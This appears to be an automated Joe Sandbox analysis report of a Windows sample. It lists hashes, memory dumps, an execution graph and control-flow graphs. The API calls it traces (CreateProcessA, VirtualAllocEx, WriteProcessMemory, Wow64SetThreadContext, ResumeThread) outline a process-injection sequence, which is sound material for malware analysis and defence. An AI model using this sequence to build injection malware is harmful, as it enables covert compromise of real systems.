                            • Opcode ID: 8e2b6b69f5274b315a4cd0ac3a134be67f5085859b50275a72d37ecf18c6858a
                            • Instruction ID: 6fb706575dfd1a80746e120e994bbffab615577fea8307d84aa71fb1eb8ddb03
                            • Opcode Fuzzy Hash: 8e2b6b69f5274b315a4cd0ac3a134be67f5085859b50275a72d37ecf18c6858a
                            • Instruction Fuzzy Hash: 232137B1C003099FCB10DFA9C981AEEFBF5FF48310F14842AE519A7240D7389941CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 052F745E
                            Memory Dump Source
                            • Source File: 00000000.00000002.1996779955.00000000052F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_52f0000_gunzipped.jbxd
                            Similarity
                            • API ID: AllocVirtual
                            • String ID:
                            • API String ID: 4275171209-0
                            • Opcode ID: d4585ce9582686d87ef9df7dd9949da8a129c8d820d9b24cdc821c5776d15905
                            • Instruction ID: 4b7cfa6d66d4d8d8ca3dfe17a7af5e5daddac4e72cbd5504f6857416e6f5d539
                            • Opcode Fuzzy Hash: d4585ce9582686d87ef9df7dd9949da8a129c8d820d9b24cdc821c5776d15905
                            • Instruction Fuzzy Hash: 3E1156B68002498FCB10DFA9C945AEEFFF5FF48314F14881AE55AA7250C7399541CFA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 052F745E
                            Memory Dump Source
                            • Source File: 00000000.00000002.1996779955.00000000052F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_52f0000_gunzipped.jbxd
                            Similarity
                            • API ID: AllocVirtual
                            • String ID:
                            • API String ID: 4275171209-0
                            • Opcode ID: 69d01b3ed39700e7ee5d1a3e7429080809f35ac08cae43c723b6a196ef0a9d87
                            • Instruction ID: 87ec84e1eda3a61f8667143338bed5f34e9fdcdfc51f37d13fc99ad64429ef05
                            • Opcode Fuzzy Hash: 69d01b3ed39700e7ee5d1a3e7429080809f35ac08cae43c723b6a196ef0a9d87
                            • Instruction Fuzzy Hash: B71137718002499FCB10DFAAC844AEEFFF5FF48314F148419E519A7250C779A544CFA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1996779955.00000000052F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_52f0000_gunzipped.jbxd
                            Similarity
                            • API ID: ResumeThread
                            • String ID:
                            • API String ID: 947044025-0
                            • Opcode ID: c89eb9b9c5174e9cdaccc80da86562c3948066f118017f03d43f9b7604b17655
                            • Instruction ID: 7d15983f6412f2870f24082b2fb5ab7045f57072bd854adcb655da5156120824
                            • Opcode Fuzzy Hash: c89eb9b9c5174e9cdaccc80da86562c3948066f118017f03d43f9b7604b17655
                            • Instruction Fuzzy Hash: A41128B5D002498FCB20DFAAC4457EEFFF5EF88314F248819D559A7240CB79A945CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1996779955.00000000052F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_52f0000_gunzipped.jbxd
                            Similarity
                            • API ID: ResumeThread
                            • String ID:
                            • API String ID: 947044025-0
                            • Opcode ID: 0d55fad24a832e30581897be321a1c7100f2f0fff4c9609d5b82a41e4cf16de1
                            • Instruction ID: d8e4a908db64ed308004504cf6848f58ea03757b8dfffcecd7c379dbb7cd84ab
                            • Opcode Fuzzy Hash: 0d55fad24a832e30581897be321a1c7100f2f0fff4c9609d5b82a41e4cf16de1
                            • Instruction Fuzzy Hash: CE113AB1D002498FCB10DFAAC445BEFFBF5EF88314F208419D519A7240CB79A944CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 052FBC25
                            Memory Dump Source
                            • Source File: 00000000.00000002.1996779955.00000000052F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_52f0000_gunzipped.jbxd
                            Similarity
                            • API ID: MessagePost
                            • String ID:
                            • API String ID: 410705778-0
                            • Opcode ID: 56c831a4bea82dfeefce2c3c544c5df559267dbbde6ffa1775e1e61cf42f00a5
                            • Instruction ID: 4d28eecf8483f4d78eeb76ddf971e08711fd61af3a97bed4906d82e001fd9d0b
                            • Opcode Fuzzy Hash: 56c831a4bea82dfeefce2c3c544c5df559267dbbde6ffa1775e1e61cf42f00a5
                            • Instruction Fuzzy Hash: DC11F5B58003499FDB10DF9AD984BEEFBF8FB48314F148419E659A7200C379A944CFA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 052FBC25
                            Memory Dump Source
                            • Source File: 00000000.00000002.1996779955.00000000052F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_52f0000_gunzipped.jbxd
                            Similarity
                            • API ID: MessagePost
                            • String ID:
                            • API String ID: 410705778-0
                            • Opcode ID: 1b79b62ab4b951d7d6f2325a52805b2959388265646e992ee148cf93a0adc778
                            • Instruction ID: a83e1c8e72e8cec91d1e3586894eadcb7526818b86e38f44520983b000b5c12b
                            • Opcode Fuzzy Hash: 1b79b62ab4b951d7d6f2325a52805b2959388265646e992ee148cf93a0adc778
                            • Instruction Fuzzy Hash: 751103B68002498FCB10DF99D585BEEFBF8FB08314F14881AD558A3200C378A544CFA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000000.00000002.1992427446.000000000097D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_97d000_gunzipped.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 978efe00d6bea6943d99a7a1dade8d5d13f8488a241bd4a12f709f7665062df2
                            • Instruction ID: ca362f13a9d9ec26d1d3ed81adfcdd2f7e9b8deddfc817b325d4b64f05b4301c
                            • Opcode Fuzzy Hash: 978efe00d6bea6943d99a7a1dade8d5d13f8488a241bd4a12f709f7665062df2
                            • Instruction Fuzzy Hash: 04319F7654D3809FD707DF20D994715BFB1AF96314F18C5EAC8894B2A3D33A980ACB62
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000000.00000002.1992427446.000000000097D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_97d000_gunzipped.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1cf53225056e74886f91eafae86c000bcd09a25535d0d3ee5d989a4732960a54
                            • Instruction ID: 963c87d99bd94ac26fb3612500544d075bb42f97a6730bb616868f96d84f18d5
                            • Opcode Fuzzy Hash: 1cf53225056e74886f91eafae86c000bcd09a25535d0d3ee5d989a4732960a54
                            • Instruction Fuzzy Hash: 6621807254D3808FD706DF14D994715BF71AF56214F18C5DAC8498B2A3C23A980ACB62
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000000.00000002.1992427446.000000000097D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_97d000_gunzipped.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f3c594945ab75396917ba5cd062288d9c28c5e348008e3dfdace88655b8e1a60
                            • Instruction ID: 8e4b146cf20b4efeee4d515c314bbfdb9c6071a09738444c5b34956ec7327a0d
                            • Opcode Fuzzy Hash: f3c594945ab75396917ba5cd062288d9c28c5e348008e3dfdace88655b8e1a60
                            • Instruction Fuzzy Hash: 0021F272604204EFDB04DF24D9C0B26BFB9FF88318F24C969D84D4B256C33AD806CA62
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000000.00000002.1992427446.000000000097D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_97d000_gunzipped.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 52ab1b693d2e323c1e90ca4af5d98ae197c7a644907e0d16af1f3948f54cfcb7
                            • Instruction ID: 30f9481919ad762c62ce466096ddbcd7b13baef7bae25abb403260c108f00f59
                            • Opcode Fuzzy Hash: 52ab1b693d2e323c1e90ca4af5d98ae197c7a644907e0d16af1f3948f54cfcb7
                            • Instruction Fuzzy Hash: 4521F276608204DFDB08DF24D980B26BB79FF88314F64C969D90D4B396C33AD846CAA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000000.00000002.1992427446.000000000097D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_97d000_gunzipped.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                            • Instruction ID: cc1d69bf142b53cd9421c6689f01752ab7110af97d3743bc9662898ee047a4fc
                            • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                            • Instruction Fuzzy Hash: 6B118B76504280DFDB06CF14D5C4B15BFB1FF84318F28C6AAD8494B656C33AD85ACB62
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000000.00000002.1992381712.000000000096D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0096D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_96d000_gunzipped.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 681130310c7a692af770b289c2e396b12752397ae39f5b19e44fcdc03aaa3c49
                            • Instruction ID: 72b89abadbf0691f87fdc30f4a62fe26033d84126fa0b26699d8239d2386f9bc
                            • Opcode Fuzzy Hash: 681130310c7a692af770b289c2e396b12752397ae39f5b19e44fcdc03aaa3c49
                            • Instruction Fuzzy Hash: 5A01D0719093449ED7148B5ACDC4B67BFDCEF46324F18C516ED294A196C37D9C40C671
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000000.00000002.1992381712.000000000096D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0096D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_96d000_gunzipped.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 78d4b175151c98e6f1fbde63f97f8eac244b39f11b0306ddd75165dd2afa0c80
                            • Instruction ID: 5c7b39be61e684c7263e54ab15c78d240a13b9cf7df6c02ebe0efca0de9df18d
                            • Opcode Fuzzy Hash: 78d4b175151c98e6f1fbde63f97f8eac244b39f11b0306ddd75165dd2afa0c80
                            • Instruction Fuzzy Hash: FCF0F6715053449EE7208A0ACCC4B62FFECEF52334F18C45AED184B296C379AC40CAB1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000000.00000002.1996779955.00000000052F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_52f0000_gunzipped.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: fd58bcca4c22bed042395e1158fd74d500bb68fbbdead13511c2758130cf6cb7
                            • Instruction ID: 1fdea9ed1d93a245fe7d8ceffa86876bef47c060c01ce3b3c2ca21f647a87aca
                            • Opcode Fuzzy Hash: fd58bcca4c22bed042395e1158fd74d500bb68fbbdead13511c2758130cf6cb7
                            • Instruction Fuzzy Hash: 3EE12774E101198FCB14DFA8D9809AEFBF2BF89305F24D169D518AB356D770A942CFA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000000.00000002.1996779955.00000000052F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_52f0000_gunzipped.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b3466de96db83f2d8104b33d05f8d9630f0e34c2bc3de73f606cde66c5c1bd46
                            • Instruction ID: 128b3da59837421c3fc48ff4b89555dec2e20cdf2fa67531d1ae5f98299aa5b1
                            • Opcode Fuzzy Hash: b3466de96db83f2d8104b33d05f8d9630f0e34c2bc3de73f606cde66c5c1bd46
                            • Instruction Fuzzy Hash: 96E10674E1411A8FCB14DFA8D5809AEFBF2BF89305F24D169D518AB356D730A942CFA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000000.00000002.1996779955.00000000052F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_52f0000_gunzipped.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a86ce926d4e91ba0bab15c8f8835ef63908ec7a41edae03306155d742f3421d7
                            • Instruction ID: b1fb6c01a60b2957e27874dd72f9d1f17138d7e18cd85c74558576aef5b5add2
                            • Opcode Fuzzy Hash: a86ce926d4e91ba0bab15c8f8835ef63908ec7a41edae03306155d742f3421d7
                            • Instruction Fuzzy Hash: 9CE11774E1011A8FCB14DFA8D5809AEFBF2FF89305F248169D919AB356D730A942CF60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000000.00000002.1996779955.00000000052F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_52f0000_gunzipped.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4da929791b73233c8819abe8e3c6a91a1032659dbad702451e752a4cf49a2d35
                            • Instruction ID: a205458064eb9861b22bb2c5c0f97c08dbb9bbc2f110346209b5eb724cc21fa0
                            • Opcode Fuzzy Hash: 4da929791b73233c8819abe8e3c6a91a1032659dbad702451e752a4cf49a2d35
                            • Instruction Fuzzy Hash: 37E11974E101198FCB14DFA8D5809AEFBF2BF89305F24D169D518AB356C771A942CFA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000000.00000002.1996779955.00000000052F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_52f0000_gunzipped.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6ea93948f87a0619f70e1c51908d1194218ac5000e89d16edc46d9c3c6b21c85
                            • Instruction ID: 46a790147f01556f7ff65888515b9e0d32935e6158b7772fb3cc99d0bea24109
                            • Opcode Fuzzy Hash: 6ea93948f87a0619f70e1c51908d1194218ac5000e89d16edc46d9c3c6b21c85
                            • Instruction Fuzzy Hash: 75E11674E142198FCB14DFA8D5809AEFBF2BF89305F24C169D919AB356D730A942CF60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000000.00000002.1993490409.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2510000_gunzipped.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b36e0396018984aeffd78253dedd661749e2c2798f5425fc251d047289bcf53e
                            • Instruction ID: a261419ad65292281838a70e16464d66f3e647d776d23b599870182305b004fe
                            • Opcode Fuzzy Hash: b36e0396018984aeffd78253dedd661749e2c2798f5425fc251d047289bcf53e
                            • Instruction Fuzzy Hash: 9ED10631D2075A8ACB05EB64D950A9DF375FF95300F10CB9AE50937225EB70AAC9CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000000.00000002.1996779955.00000000052F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_52f0000_gunzipped.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 81b1caeec96539b99d81deaf707ba7c7c8e685b01192706d549cfd3b900869f5
                            • Instruction ID: c0550838640ed9d0e1db92fb7c6743f78097589d28a39429f35e1fe35d753fc4
                            • Opcode Fuzzy Hash: 81b1caeec96539b99d81deaf707ba7c7c8e685b01192706d549cfd3b900869f5
                            • Instruction Fuzzy Hash: 69513A70E102198FCB14DFA9D9845AEFBF2BF89301F24C16AD418A7356D7309A42CFA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000000.00000002.1996779955.00000000052F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_52f0000_gunzipped.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b3e2a8cc717238520e0ae7aa0301b24ec134d6c280c4565ed934f43ccb3c5991
                            • Instruction ID: f02f2afcacd5d009dfd8895c0b8113f7585b4dc6c57bc3180f453de805ed9de3
                            • Opcode Fuzzy Hash: b3e2a8cc717238520e0ae7aa0301b24ec134d6c280c4565ed934f43ccb3c5991
                            • Instruction Fuzzy Hash: AB513B70E142198FDB14CFA9D9849AEFBF2BF89305F24C169D418A7356D7309A42CF60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Execution Graph

                            Execution Coverage:9.5%
                            Dynamic/Decrypted Code Coverage:100%
                            Signature Coverage:0%
                            Total number of Nodes:111
                            Total number of Limit Nodes:5
                            execution_graph 24088 1314a30 24089 1314a39 24088->24089 24090 1314a3f 24089->24090 24092 1314b28 24089->24092 24093 1314b4d 24092->24093 24097 1314c28 24093->24097 24101 1314c38 24093->24101 24099 1314c38 24097->24099 24098 1314d3c 24098->24098 24099->24098 24105 1314864 24099->24105 24102 1314c5f 24101->24102 24103 1314864 CreateActCtxA 24102->24103 24104 1314d3c 24102->24104 24103->24104 24106 1315cc8 CreateActCtxA 24105->24106 24108 1315d8b 24106->24108 24109 6326e30 24110 6326e70 ResumeThread 24109->24110 24112 6326ea1 24110->24112 24113 6327b65 24114 6327d15 24113->24114 24119 6329870 24114->24119 24130 63298e6 24114->24130 24142 6329880 24114->24142 24115 6327d25 24120 632987a 24119->24120 24127 63298a2 24120->24127 24153 6329f29 24120->24153 24158 632a495 24120->24158 24162 6329df7 24120->24162 24167 6329e66 24120->24167 24172 6329ce6 24120->24172 24177 632a700 24120->24177 24181 632a1d0 24120->24181 24187 6329fc9 24120->24187 24127->24115 24131 6329874 24130->24131 24133 63298e9 24130->24133 24132 63298a2 24131->24132 24134 632a1d0 2 API calls 24131->24134 24135 632a700 2 API calls 24131->24135 24136 6329ce6 2 API calls 24131->24136 24137 6329e66 2 API calls 24131->24137 24138 6329df7 2 API calls 24131->24138 24139 632a495 2 API calls 24131->24139 24140 6329f29 2 API calls 24131->24140 24141 6329fc9 2 API calls 24131->24141 24132->24115 24133->24115 24134->24132 24135->24132 24136->24132 24137->24132 24138->24132 24139->24132 24140->24132 24141->24132 24143 6329893 24142->24143 24144 63298a2 24143->24144 24145 632a1d0 2 API calls 24143->24145 24146 632a700 2 API calls 24143->24146 24147 6329ce6 2 API calls 24143->24147 24148 6329e66 2 API calls 24143->24148 24149 6329df7 2 API calls 24143->24149 24150 632a495 2 API calls 24143->24150 24151 6329f29 2 API calls 24143->24151 24152 6329fc9 2 API calls 24143->24152 24144->24115 24145->24144 24146->24144 24147->24144 24148->24144 24149->24144 24150->24144 24151->24144 24152->24144 24154 6329f2f 24153->24154 24191 63274b0 24154->24191 24195 63274a8 24154->24195 24155 6329f61 24199 63275a0 24158->24199 24203 6327599 24158->24203 24159 632a4b7 24163 6329e07 24162->24163 24165 63274b0 WriteProcessMemory 24163->24165 24166 63274a8 WriteProcessMemory 24163->24166 24164 632a4fd 24164->24127 24165->24164 24166->24164 24168 632a391 24167->24168 24207 6327310 24168->24207 24211 6327318 24168->24211 24169 632a3ac 24173 6329cec 24172->24173 24215 632772d 24173->24215 24219 6327738 24173->24219 24179 63274b0 WriteProcessMemory 24177->24179 24180 63274a8 WriteProcessMemory 24177->24180 24178 632a724 24179->24178 24180->24178 24182 6329f40 24181->24182 24183 632a1dd 24181->24183 24185 63274b0 WriteProcessMemory 24182->24185 24186 63274a8 WriteProcessMemory 24182->24186 24184 6329f61 24185->24184 24186->24184 24223 63273f0 24187->24223 24227 63273e8 24187->24227 24188 6329fe7 24192 63274f8 WriteProcessMemory 24191->24192 24194 632754f 24192->24194 24194->24155 24196 63274b0 WriteProcessMemory 24195->24196 24198 632754f 24196->24198 24198->24155 24200 63275eb ReadProcessMemory 24199->24200 24202 632762f 24200->24202 24202->24159 24204 63275a0 ReadProcessMemory 24203->24204 24206 632762f 24204->24206 24206->24159 24208 6327318 Wow64SetThreadContext 24207->24208 24210 63273a5 24208->24210 24210->24169 24212 632735d Wow64SetThreadContext 24211->24212 24214 63273a5 24212->24214 24214->24169 24216 63277c1 24215->24216 24216->24216 24217 6327926 CreateProcessA 24216->24217 24218 6327983 24217->24218 24218->24218 24220 63277c1 CreateProcessA 24219->24220 24222 6327983 24220->24222 24222->24222 24224 6327430 VirtualAllocEx 24223->24224 24226 632746d 24224->24226 24226->24188 24228 63273f0 VirtualAllocEx 24227->24228 24230 632746d 24228->24230 24230->24188 24231 632aa58 24232 632abe3 24231->24232 24234 632aa7e 24231->24234 24234->24232 24235 6328f68 24234->24235 24236 632acd8 PostMessageW 24235->24236 24237 632ad44 24236->24237 24237->24234

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 859 632772d-63277cd 861 6327806-6327826 859->861 862 63277cf-63277d9 859->862 867 6327828-6327832 861->867 868 632785f-632788e 861->868 862->861 863 63277db-63277dd 862->863 864 6327800-6327803 863->864 865 63277df-63277e9 863->865 864->861 869 63277eb 865->869 870 63277ed-63277fc 865->870 867->868 871 6327834-6327836 867->871 878 6327890-632789a 868->878 879 63278c7-6327981 CreateProcessA 868->879 869->870 870->870 872 63277fe 870->872 873 6327838-6327842 871->873 874 6327859-632785c 871->874 872->864 876 6327846-6327855 873->876 877 6327844 873->877 874->868 876->876 880 6327857 876->880 877->876 878->879 881 632789c-632789e 878->881 890 6327983-6327989 879->890 891 632798a-6327a10 879->891 880->874 883 63278a0-63278aa 881->883 884 63278c1-63278c4 881->884 885 63278ae-63278bd 883->885 886 63278ac 883->886 884->879 885->885 888 63278bf 885->888 886->885 888->884 890->891 901 6327a12-6327a16 891->901 902 6327a20-6327a24 891->902 901->902 903 6327a18 901->903 904 6327a26-6327a2a 902->904 905 6327a34-6327a38 902->905 903->902 904->905 906 6327a2c 904->906 907 6327a3a-6327a3e 905->907 908 6327a48-6327a4c 905->908 906->905 907->908 909 6327a40 907->909 910 6327a5e-6327a65 908->910 911 6327a4e-6327a54 908->911 909->908 912 6327a67-6327a76 910->912 913 6327a7c 910->913 911->910 912->913 915 6327a7d 913->915 915->915
                            APIs
                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0632796E
                            Memory Dump Source
                            • Source File: 00000009.00000002.2025516970.0000000006320000.00000040.00000800.00020000.00000000.sdmp, Offset: 06320000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_6320000_WiHDtnb.jbxd
                            Similarity
                            • API ID: CreateProcess
                            • String ID:
                            • API String ID: 963392458-0
                            • Opcode ID: b1ddbfb8727a483fde7a60fe8a9990022c4f3279086e1981b92cd08ac5d7404d
                            • Instruction ID: da5a41c586fa5d858a943f0ead70665988099c048a8f1656715fcc995fef4b46
                            • Opcode Fuzzy Hash: b1ddbfb8727a483fde7a60fe8a9990022c4f3279086e1981b92cd08ac5d7404d
                            • Instruction Fuzzy Hash: D9915C71D0022ACFDB64CF68C841BEDBBB2FF48314F14856AD819A7284DB759985CF91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 916 6327738-63277cd 918 6327806-6327826 916->918 919 63277cf-63277d9 916->919 924 6327828-6327832 918->924 925 632785f-632788e 918->925 919->918 920 63277db-63277dd 919->920 921 6327800-6327803 920->921 922 63277df-63277e9 920->922 921->918 926 63277eb 922->926 927 63277ed-63277fc 922->927 924->925 928 6327834-6327836 924->928 935 6327890-632789a 925->935 936 63278c7-6327981 CreateProcessA 925->936 926->927 927->927 929 63277fe 927->929 930 6327838-6327842 928->930 931 6327859-632785c 928->931 929->921 933 6327846-6327855 930->933 934 6327844 930->934 931->925 933->933 937 6327857 933->937 934->933 935->936 938 632789c-632789e 935->938 947 6327983-6327989 936->947 948 632798a-6327a10 936->948 937->931 940 63278a0-63278aa 938->940 941 63278c1-63278c4 938->941 942 63278ae-63278bd 940->942 943 63278ac 940->943 941->936 942->942 945 63278bf 942->945 943->942 945->941 947->948 958 6327a12-6327a16 948->958 959 6327a20-6327a24 948->959 958->959 960 6327a18 958->960 961 6327a26-6327a2a 959->961 962 6327a34-6327a38 959->962 960->959 961->962 963 6327a2c 961->963 964 6327a3a-6327a3e 962->964 965 6327a48-6327a4c 962->965 963->962 964->965 966 6327a40 964->966 967 6327a5e-6327a65 965->967 968 6327a4e-6327a54 965->968 966->965 969 6327a67-6327a76 967->969 970 6327a7c 967->970 968->967 969->970 972 6327a7d 970->972 972->972
                            APIs
                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0632796E
                            Memory Dump Source
                            • Source File: 00000009.00000002.2025516970.0000000006320000.00000040.00000800.00020000.00000000.sdmp, Offset: 06320000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_6320000_WiHDtnb.jbxd
                            Similarity
                            • API ID: CreateProcess
                            • String ID:
                            • API String ID: 963392458-0
                            • Opcode ID: d9138be40a8c869323fc3cd7543a905f6bfa62d425c0b16eda26fc122aa2f5c6
                            • Instruction ID: b1f480f8cfa14951aa570bbac03ef9a170dee80b77720001a976ea2adf4843d6
                            • Opcode Fuzzy Hash: d9138be40a8c869323fc3cd7543a905f6bfa62d425c0b16eda26fc122aa2f5c6
                            • Instruction Fuzzy Hash: 9C915B71D0022ACFDB64CF68C841BEEBBB2FF48314F1485AAD809A7244DB759985CF91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1082 1314864-1315d89 CreateActCtxA 1085 1315d92-1315dec 1082->1085 1086 1315d8b-1315d91 1082->1086 1093 1315dfb-1315dff 1085->1093 1094 1315dee-1315df1 1085->1094 1086->1085 1095 1315e01-1315e0d 1093->1095 1096 1315e10 1093->1096 1094->1093 1095->1096 1098 1315e11 1096->1098 1098->1098
                            APIs
                            • CreateActCtxA.KERNEL32(?), ref: 01315D79
                            Memory Dump Source
                            • Source File: 00000009.00000002.2022442257.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_1310000_WiHDtnb.jbxd
                            Similarity
                            • API ID: Create
                            • String ID:
                            • API String ID: 2289755597-0
                            • Opcode ID: 609e03037277d2be97a856a564b20035c52892e13e0d45b6e59309dd852693c0
                            • Instruction ID: 462af22fa06cd793d4dacb488f55f2c3ec7582519aa6b5ff680ee2feb9bdd6aa
                            • Opcode Fuzzy Hash: 609e03037277d2be97a856a564b20035c52892e13e0d45b6e59309dd852693c0
                            • Instruction Fuzzy Hash: F541F2B0C0071DCBDB28DFA9C848B9EBBF5BF89304F20805AD408AB255DB756946CF91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1099 1315cbc-1315cc4 1100 1315ccc-1315d89 CreateActCtxA 1099->1100 1102 1315d92-1315dec 1100->1102 1103 1315d8b-1315d91 1100->1103 1110 1315dfb-1315dff 1102->1110 1111 1315dee-1315df1 1102->1111 1103->1102 1112 1315e01-1315e0d 1110->1112 1113 1315e10 1110->1113 1111->1110 1112->1113 1115 1315e11 1113->1115 1115->1115
                            APIs
                            • CreateActCtxA.KERNEL32(?), ref: 01315D79
                            Memory Dump Source
                            • Source File: 00000009.00000002.2022442257.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_1310000_WiHDtnb.jbxd
                            Similarity
                            • API ID: Create
                            • String ID:
                            • API String ID: 2289755597-0
